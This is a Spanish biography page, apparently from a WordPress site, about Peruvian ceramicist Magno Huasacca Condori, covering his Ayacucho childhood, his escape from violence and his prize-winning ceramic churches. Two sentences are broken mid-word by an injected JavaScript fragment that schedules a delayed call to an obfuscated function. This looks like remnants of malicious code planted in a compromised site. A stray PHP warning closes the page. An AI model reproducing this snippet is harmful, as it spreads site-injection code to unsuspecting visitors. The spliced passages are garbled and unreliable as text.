please wait, site is loading

Magno Huasacca Condori

Magno Lucio Huasacca Condori (1969)
Quinua, Ayacucho – Perú
Cerámica

Magno_Huasacca_001Magno Lucio Huasacca Condori nació en 1969 en Puente Piedra, Lima, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sus padres, oriundos de Quinua, Ayacucho, se encontraban en esta ciudad por razones de trabajo. Siendo el tercero de diez hermanos, al cumplir cinco años regresó a Quinua junto a toda su familia. Desde niño entendió que debía aprender los quehaceres de la casa para ayudar de alguna forma en el sostenimiento de la familia. Precisamente a los diez años su padre le enseñó a elaborar iglesias de cerámica, que luego vendían e intercambiaban: “Al llegar del colegio, rápido me ponía a hacer iglesias y luego las tareas, y los fines de semana ayudaba en el campo”, recuerda Magno. Más adelante, su tío Alberto Rojas le enseñó nuevas técnicas que fueron enriqueciendo su talento. Es así que a los 12 años participa en un concurso de cerámica en vivo y obtiene su primer premio.

Entre los estudios escolares, la cerámica y el campo trascurrían los días de Magno, hasta que por la violencia que se vivía en la zona se vio obligado a huir a los “huaycos” junto a su hermano Lucho para evitar ser reclutados o asesinados. Siendo la inseguridad cada vez mayor, al cumplir los 15 años Magno viajó a Lima en busca de tranquilidad y trabajó en el taller de Artemio Orellana durante un año. Sin embargo, con el deseo de completar sus estudios escolares, regresó a Quinua, y su madre, Doña Sussana, lo envió a estudiar a Huamanga. Cumplidos sus estudios escolares volvió a Lima en busca de nuevas oportunidades. Esta vez lo recibió su hermano Luis y trabajaron juntos en su propio taller. Su talento artístico le valió para enfrentar la adversidad y salir adelante.

Hoy se dedica a tiempo completo a la cerámica y tiene un taller en los Huertos de Villa, en Chorrillos. Ha sido premiado en el IV y V Concurso Nacional de Nacimientos, obteniendo el tercer lugar y una mención honrosa respectivamente. “Poco a poco he venido mejorandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la figura humana, pero mi especialidad son las iglesias”, cuenta Magno.


    Warning: Invalid argument supplied for foreach() in /home/suyajrun/public_html/wp-content/plugins/widgetkit/widgets/slideshow/styles/default/template.php on line 21